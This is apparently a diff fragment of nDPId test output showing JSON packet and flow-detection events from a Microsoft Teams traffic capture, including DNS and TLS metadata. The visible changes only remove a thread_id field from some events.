00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2019,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1587041685996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685996,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0TQBAAHUGACA0ccKEwKgBBgG77I3LqgPISlZN3IAS\/\/9gggAAAgQFoAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2019,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1587041685996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685996,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0TQBAAHUGACA0ccKEwKgBBgG77I3LqgPISlZN3IAS\/\/9gggAAAgQFoAEDAwgBAQQC"}
@@ -293,8 +293,8 @@
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686288,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyPAbtgh2e+U\/RRNYAQEAkdGQAAAQEICjCEvUBhH1u7"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686288,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyPAbtgh2e+U\/RRNYAQEAkdGQAAAQEICjCEvUBhH1u7"}
00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686239,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041686288,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686239,"flow_last_seen":1587041686288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041686288,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2074,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041686239,"flow_last_seen":1587041686542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1587041686542,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2074,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041686239,"flow_last_seen":1587041686542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1587041686542,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041686589,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041686589,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041686611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041686611}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1587041686659,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1587041686659,"pkt":"\/\/\/\/\/\/\/\/jP5XIzfkCABFAABE9p0AAEAR\/0vAqAFwwKgB\/+EV4RUAME6OU3BvdFVkcDBE2bWZ25IvowABAADKIN8ICP0NzlEBuCwq6R7jWIhweQ=="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1587041686659,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1587041686659,"pkt":"\/\/\/\/\/\/\/\/jP5XIzfkCABFAABE9p0AAEAR\/0vAqAFwwKgB\/+EV4RUAME6OU3BvdFVkcDBE2bWZ25IvowABAADKIN8ICP0NzlEBuCwq6R7jWIhweQ=="}
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
@@ -312,8 +312,8 @@
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1587041687370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041687370,"pkt":"EBMx8Tl2KDc3AG3ICABFAABF06EAAP8RZK7AqAEGwKgBAdM1ADUAMUK+cAQBAAABAAAAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAE="} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1587041687370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041687370,"pkt":"EBMx8Tl2KDc3AG3ICABFAABF06EAAP8RZK7AqAEGwKgBAdM1ADUAMUK+cAQBAAABAAAAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAE="}
00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00372{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2198,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041687382,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2198,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041687382,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2198,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041687412} 00185{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2198,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041687412}
00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1587041687435,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1587041687435,"pkt":"KDc3AG3IEBMx8Tl2CABFAAD6rblAADkRD+LAqAEBwKgBBgA10zUA5gAAcASBgAABAAYAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAHADAAFAAEAAAe+AB8DYXBpBnN0cmVhbQ50cmFmZmljbWFuYWdlcgNuZXQAwDUABQABAAAAPAAJBmV1d2UtMcAMwGAABQABAAAEVQANCmV1d2UtMS1hcGnAQMB1AAUAAQAAACkACwhldXdlLTEtMcAMwI4ABQABAAAAwQApHWFtcy1ldXdlLTEtaG9zLWFwaWdhdGV3YXktMS0xCGNsb3VkYXBwwE\/ApQABAAEAAAANAARoKLuX"} 00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1587041687435,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1587041687435,"pkt":"KDc3AG3IEBMx8Tl2CABFAAD6rblAADkRD+LAqAEBwKgBBgA10zUA5gAAcASBgAABAAYAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAHADAAFAAEAAAe+AB8DYXBpBnN0cmVhbQ50cmFmZmljbWFuYWdlcgNuZXQAwDUABQABAAAAPAAJBmV1d2UtMcAMwGAABQABAAAEVQANCmV1d2UtMS1hcGnAQMB1AAUAAQAAACkACwhldXdlLTEtMcAMwI4ABQABAAAAwQApHWFtcy1ldXdlLTEtaG9zLWFwaWdhdGV3YXktMS0xCGNsb3VkYXBwwE\/ApQABAAEAAAANAARoKLuX"}
00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041687435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.40.187.151"}} 00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041687435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.40.187.151"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687436,"flow_last_seen":1587041687436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687436,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687436,"flow_last_seen":1587041687436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687436,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -322,8 +322,8 @@
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2204,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687466,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVVbAqAEGaCi7l+ySAbtvi5oJgZblB4AQEAkTrwAAAQEICjCEwbkBuRsf"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2204,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687466,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVVbAqAEGaCi7l+ySAbtvi5oJgZblB4AQEAkTrwAAAQEICjCEwbkBuRsf"}
00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2205,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687436,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041687466,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2205,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687436,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041687466,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2226,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041687245,"flow_last_seen":1587041687544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1587041687544,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2226,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041687245,"flow_last_seen":1587041687544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1587041687544,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041687600,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041687600,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
